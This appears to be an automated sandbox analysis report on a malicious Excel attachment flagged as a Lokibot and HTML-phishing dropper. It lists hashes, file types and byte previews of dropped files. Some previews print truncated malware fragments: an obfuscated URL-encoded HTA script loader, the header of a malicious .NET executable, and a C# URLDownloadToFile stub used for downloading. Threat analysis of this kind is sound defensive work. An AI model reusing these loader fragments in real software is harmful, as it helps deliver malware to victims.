                                                                    Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                    • 198.244.140.41
                                                                    No context
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):4742
                                                                    Entropy (8bit):4.8105940880640246
                                                                    Encrypted:false
                                                                    SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                    MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                    SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                    SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                    SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                    Malicious:false
                                                                    Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.34726597513537405
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlll:Nll
                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                    Malicious:false
                                                                    Preview:@...e...........................................................
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:modified
                                                                    Size (bytes):182352
                                                                    Entropy (8bit):2.3378885496144393
                                                                    Encrypted:false
                                                                    SSDEEP:96:4vCl17HUofTaTGoHTapZR3CyYaMJhS1i3hTaNopQ:4vCldHULTG3pZLYKi3gN2Q
                                                                    MD5:4CE3B0E612E1968B6C491AB1AB818884
                                                                    SHA1:CBC890A816E9B7E993C90FB63D51526A76616323
                                                                    SHA-256:A786CB2AE0DC8117E3BFC07BCA8BB0E5D4545AB8F5B4AA042C9EE85DCA7B43A0
                                                                    SHA-512:9B87141B10A2E781E51483DCED485817AEB34B545F6DBF64803B4B3621CD4DD74587A5033AB1AA3B931FBD39BC7C77650A0CCDD6B4132B48FBEAB9D0FBB3D816
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta, Author: Joe Security
                                                                    Preview:<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252522%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CscRipt%25252520Type%2525253D%25252522TexT/vbsCRipT%25252522%2525253E%2525250ADim%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):600576
                                                                    Entropy (8bit):7.915042903583073
                                                                    Encrypted:false
                                                                    SSDEEP:12288:frO3+Ri3AgFdygxDJz5WFux50+KnCKmfRLdW3Kt9c+O7:LQ3AgyKJdG+wmNdsKM+O7
                                                                    MD5:74061922F1E78C237A66D12A15A18181
                                                                    SHA1:E31EE444AAA552A100F006E43F0810497A3B0387
                                                                    SHA-256:89BF888148EAE2CAABDC6D3FFF98054127B197B402493581894A3104ED6B6F1C
                                                                    SHA-512:306744107D78B02ECFD28252DAE954F0B47C1F761E15A33C937474A2E15284C17BB7E2542618B745EA5F95E5A7DBA3D27B675C8837914A44D8B5B350A3D4A136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5=g..............0...... .......'... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................'......H........6...(...........^..(.............................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):1504468
                                                                    Entropy (8bit):1.7693060102813485
                                                                    Encrypted:false
                                                                    SSDEEP:3072:L+6i9zy7v2/uEB1A/meRlmRYT9FANxg2WUZUKdRLuk0VgHPLk9CVi:LKERludvLuk0Vgk9CVi
                                                                    MD5:EF3C18CC49B02153C770DB977B2E7435
                                                                    SHA1:D436E0F820DDBBA10DB4D3F1243ED3AA6468C057
                                                                    SHA-256:F328FB5B6055B687344190BB13D8DD6CDF6EA76D4AAAE6C5112DEC1B32ACE3C2
                                                                    SHA-512:2081EF5EE87A360894B8726494F30DFEEFF7D922E733D2E633A3D010DE56C6A4CAEADEEBE4CD12A28658AE250ADE3B093F2FAB032B92A31D511D9C99A12AF337
                                                                    Malicious:false
                                                                    Preview:....l...........I...R............:...).. EMF................................8...X....................?...........................................:...)..........J...S...Q...............I...R...................J...S...P...(...x........... ....:...)..(...J...S.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):1296688
                                                                    Entropy (8bit):3.591660498552015
                                                                    Encrypted:false
                                                                    SSDEEP:6144:JQmd3s01u2uIfTlw35Y5kndm9wHiT53ZkyOmCl6PV2yuxOKNOKj:vNWQTi35JH1RW7vz4
                                                                    MD5:D00A1317B51C58FCF05D3B801FF5A898
                                                                    SHA1:6B610957FC045D55DEB7A55616302F9186AA2E6C
                                                                    SHA-256:800C36FBCC44628AC220EBB68BA7DCDED8E53217E9EE90C638A9DB20FE657A5E
                                                                    SHA-512:54646FBA5458D5FEE036C130C469550F165AFAE977707A0F41008D677463AF111D19D203CC369F22DDE51CF788754E033CB6F4845E6E87F05BA2AF82975DB870
                                                                    Malicious:false
                                                                    Preview:....l...........................6[...%.. EMF....0.......$.......................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......1.......Z.......1.......*...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):3064680
                                                                    Entropy (8bit):1.8507381356738084
                                                                    Encrypted:false
                                                                    SSDEEP:6144:NaeRlcBvLukyV6kTCVQKERludvLuk0Vgk9CVX:oeRlM7kmERlyDku
                                                                    MD5:93774BB9AECD3837D6496AE965D1BD80
                                                                    SHA1:AE60D6A30E74BB5BE492CA71B82205D5C6B850C4
                                                                    SHA-256:6CDB58A3C6906A6DD49DB83340ACC7AF0B7C7BBA5C01D8B0A9F562AEBDC85897
                                                                    SHA-512:3810C4CDE003BAF916D626A41C0534BF421F5CDBF64D897F385FEDA36F556B6FECC27DB294A39F89C82DF0570424DE2EBB789E0B2294D42BFF80A64756257BD6
                                                                    Malicious:false
                                                                    Preview:....l............................]..WT.. EMF....h...........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................2......."...........!...............................................2......."...........!...............................................2......."...........!...............................................2.......'.......................%...........................................................L...d.......L.......!.......L...........!..............?...........?................................L...d...y...Y...........y...Y.......[...!..............?...........?................................'.......................%...................................&...
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):3191264
                                                                    Entropy (8bit):2.0118490192617995
                                                                    Encrypted:false
                                                                    SSDEEP:6144:nA0Ki15RlURvLuky+NkuCVAKERludvLuk0Vgk9CVnOKAOK1:P5RlMHk5ERlyDkr8a
                                                                    MD5:04A17584C7203C47419D4AC2163B98C6
                                                                    SHA1:485E17A82AE4672AC8D4B542CA0F509B80C0C4DF
                                                                    SHA-256:EBA2B7C929B2EAA16FB1F733B7ACDDDFD80635A7211B3FBE400FF2796C17827E
                                                                    SHA-512:043092951F27E81FF96DA084E8112107D6F00DAEE83ADA80132BEC696E56309D16FDDED39F7F3810CA58BB6357CC6A75718CDD2F7B4342CF82D0421B7681A88C
                                                                    Malicious:false
                                                                    Preview:....l...........@................S...".. EMF.....0.....#...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):7440
                                                                    Entropy (8bit):5.6312448977812695
                                                                    Encrypted:false
                                                                    SSDEEP:96:PV1Ipi7blJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHDx:PVxvTNAK4oOIGbK1RvVwPAWmOHDx
                                                                    MD5:DEA1DEA8BEA479821FA2AC1C565B6E56
                                                                    SHA1:86865637336A9FEFA98AC5ABD189A848BE8852D4
                                                                    SHA-256:64832E2264B5A851EE2CC7E048DA437D6F41B1C3DCAA385971DAA1B502A11125
                                                                    SHA-512:1E1858F58748BF88DAB254F524943AC2C8576B4546AA67E37DFFE8917396A1CCCBA3964554AA77C599DD1CA184A56B8AFC3406A14C880A1B88D163EB04BACA1C
                                                                    Malicious:false
                                                                    Preview:....l........... ...<...........w....... EMF................................8...X....................?..............................@...C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.......d............................Xt....\.............L...7.Xt........].v?.Xt......Xt.......w8.....9............w....$.......d...........*XYt.....XYtH...8....d....9.-...4...6=.w................<.fv.[Sw....X..V..............................Twdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Microsoft Excel 2007+
                                                                    Category:dropped
                                                                    Size (bytes):24052
                                                                    Entropy (8bit):7.652425367216495
                                                                    Encrypted:false
                                                                    SSDEEP:384:EaNYaTXe5BPJ2cpRYnyAt3TtsVaWtmGJA8+6qdPGlDLRoucPQFVJG:Ea6aje5BP7RMYt9h44wQFV4
                                                                    MD5:AE24ADB29E22854D176245019B60E937
                                                                    SHA1:28E9F74782AA0D138EE52E3191248F827BF27A1D
                                                                    SHA-256:5BF5C455288A0B5184B23744506939B604BF402E346AFAE18269BBE888412129
                                                                    SHA-512:10AE2624E874CBA663DA08AA0C0FEBE19421FD01F72D54957F22A028A58A33BD4078C6A9CCA7CDAB94FC59030894BEA018141E6920AF4E926155C7EE49B6507D
                                                                    Malicious:false
                                                                    Preview:PK..........!.*.B.....@.......[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..W.."o.....U.aAaY...`.5~...3....3*(ME3.Dy..|..W[...hch.y........V.z../E...Q..h..P\..,.w.....[....R...+lb.._..."~.k...5....1....`....t..Qu...{%O6..z._.j.J.Y....`>.......g..S.e.. .-3.. bc(.jy..5P.L?.g..u......{.%b..ZP.N..s........G....s..6....`o.N0.........|.<FTM.=..k...7.N.4......p..sL(....@....N...,.s......C.Q........?........:.r...=;q.G....`..O...G.O.)..N...A...i.....o.......PK..........!...%S............_rels/.rels ...(.................................
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:gAWY3n:qY3n
                                                                    MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                    SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                    SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                    SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                    Malicious:false
                                                                    Preview:[ZoneTransfer]..ZoneId=3..
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 06:56:43 2024, 1st section name ".debug$S"
                                                                    Category:dropped
                                                                    Size (bytes):1328
                                                                    Entropy (8bit):3.9873331651804085
                                                                    Encrypted:false
                                                                    SSDEEP:24:HVe9EurU8z4SdHZwKdNWI+ycuZhNpakSXPNnqSqd:crUMiKd41ulpa3FqSK
                                                                    MD5:FC26452EC282394A181D29F33ACFEE80
                                                                    SHA1:D9285273ED9FAFE656EEE56B98B721EC73EC7430
                                                                    SHA-256:AAC67BD2C00E4FF3177F24BE801BF260FB50392498CFDC643AFCE4560A0F22D9
                                                                    SHA-512:0C2295906B4D1A31B7FFC5E5A431501E231E15D8FC448F858EF69A3BA959599E22596FBD3002A7AEE61DC88B1456B551B0EB397BFF420B72D3706FD1B139A99A
                                                                    Malicious:false
                                                                    Preview:L...+.=g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP..................!.....O...............4.......C:\Users\user\AppData\Local\Temp\RES37A5.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.4.i.k.0.b.i.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 06:57:14 2024, 1st section name ".debug$S"
                                                                    Category:dropped
                                                                    Size (bytes):1328
                                                                    Entropy (8bit):4.000351085939844
                                                                    Encrypted:false
                                                                    SSDEEP:24:Hxke9E2UYGmdH9wKdNWI+ycuZhNQlgakSplFPNnqSqd:ys+Kd41ulwga3LfqSK
                                                                    MD5:EE1812B0038CEC23B728DEDE2C53289C
                                                                    SHA1:2EE43AE1B8F407AD89F8BEB939DBE2A9AC3CFA58
                                                                    SHA-256:DDE57C762C2206AF2F11E011364C4438094FDEF2C9AC9919E2D01D4660B016ED
                                                                    SHA-512:77DF995752F4B5A5FA8AC72EC22D233D3864F00A157ABEC4620CC0B2C6BDDA659ACE7C67D77664E0220E6FBBCA7668CC624C2D379CD93FCE660335DE06DA32B6
                                                                    Malicious:false
                                                                    Preview:L...J.=g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP................J&.........W..........4.......C:\Users\user\AppData\Local\Temp\RESB0AA.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.p.w.v.v.p.v.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:MSVC .res
                                                                    Category:dropped
                                                                    Size (bytes):652
                                                                    Entropy (8bit):3.069001916388609
                                                                    Encrypted:false
                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grybak7YnqqXPN5Dlq5J:+RI+ycuZhNpakSXPNnqX
                                                                    MD5:EF02218BC8B387D1D94F1AEAC393C2F2
                                                                    SHA1:98C48B3169B4B9DF113639A7D43F291E5DC24C7D
                                                                    SHA-256:9AB05741A14B35590044F3DA9DDABBD1C34BFFF49EA010F742069D4C11DB3CF1
                                                                    SHA-512:2909E2C49DD7605D95A2F70F6A963AF8CFB8F221BF717516BB6BB85E7413F3946125882C03BF15299F62DB8633F71434E30273AC92616032BA8C617FFDBF3793
                                                                    Malicious:false
                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.4.i.k.0.b.i.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.4.i.k.0.b.i.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (372)
                                                                    Category:dropped
                                                                    Size (bytes):484
                                                                    Entropy (8bit):3.8560947564999073
                                                                    Encrypted:false
                                                                    SSDEEP:6:V/DsYLDS81zu9l3NPMGHvQXReKJ8SRHy4HXQrBSOscVdmevvIy:V/DTLDfuhAXfHDQjmeYy
                                                                    MD5:FE82050659A8B97690D60529499222C1
                                                                    SHA1:7CC50135852B46DD1E36F2FF98506613DB525A68
                                                                    SHA-256:64C38563C4588B718B03AEC685677F173456D3C961EF97CD95E7784EE1E51A6A
                                                                    SHA-512:59356FD5CBB38A06BF09E182B8ED7C7C2200E6F8DE8E950BE38BEE0C45AA96B2DBF202BDC56097A74ACC4E0A8BC601558E83C098A376630CFA1BCCE64133D64F
                                                                    Malicious:false
                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace WPfW.{. public class dXGM. {. [DllImport("urlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZPntVsRhAh,string MyjpqIkQwDb,string ujQQpSXoIWy,uint M,IntPtr aYypvlykpe);.. }..}.
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
